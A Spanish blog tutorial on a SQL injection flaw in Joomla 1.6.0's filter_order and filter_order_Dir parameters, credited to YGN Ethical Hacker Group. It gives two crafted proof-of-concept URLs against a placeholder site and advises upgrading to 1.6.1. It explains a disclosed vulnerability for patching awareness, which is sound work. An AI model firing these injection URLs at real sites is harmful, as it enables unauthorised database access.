SQL Injection sobre Joomla 1.6.0

Cada cierto tiempo aparecen nuevas versiones de Joomla que solucionan vulnerabilidades de seguridad del core, o nucleo. En este tutorial os quiero enseñar cómo se puede explotar una de estas vulnerabilidades, en concreto una del tipo inyección de SQL sobre Joomla 1.6.0, que descubrió el YGN Ethical Hacker Group.

Con esto no pretendo enseñaros a hacer hacking a sitios realizados con Joomla 1.6.0, sino ilustrar la importancia que tiene que nuestro sitio se encuentre actualizado para prevenir este tipo de ataques u otros posibles. También recordaros que es importante actualizar vuestras extensiones, ellas también pueden verse afectadas y debemos estar pendientes de sus actualizaciones de seguridad.

Descripción de la vulnerabilidad

Los parámetros filter_order y filter_order_Dir no estaban correctamente sanitizados, este hecho permitía que se pudidera hacer SQL Injection sobre Joomla. Un atacante podría inyectar sentencias SQL para manipular la base de datos, de forma  que podría mostrar la información en el navegador web o modificarla.

Explotando la vulnerabilidad

Para explotar esta vulnerabilidad de seguridad solo habría acceder al sitio web que se va a atacar con una de las siguientes URLs. De esta forma se consigue inyectar "yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

{codecitation}

http://webatacada.com/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAA,&filter_order_Dir=2&limit=3&limitstart=4

{/codecitation}

{codecitation}

http://webatacada.com/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB,&limit=3&limitstart=4

{/codecitation}

Solución

Actualizar a  Joomla 1.6.1 o una versión superior. Los responsables de YGN avisaron al proyecto Joomla de esta vulnerabilidad y una vez fue corregida y publicada en Joomla 1.6.1 procedieron a liberar la información sobre cómo se explota esta vulnerabilidad.

 

En AyudaJoomla | Actualizar Joomla 1.6

En AyudaJoomla | Hackear Joomla 1.5

Escribir un comentario

Por favor procura que tus comentarios estén relacionados con la entrada, comenta con tu nombre y no pongas enlaces en tu comentario. Intenta también respetar a los demás lectores, los comentarios off topic, promocionales, ofensivos o ilegales serán editados y borrados.


Código de seguridad
Refescar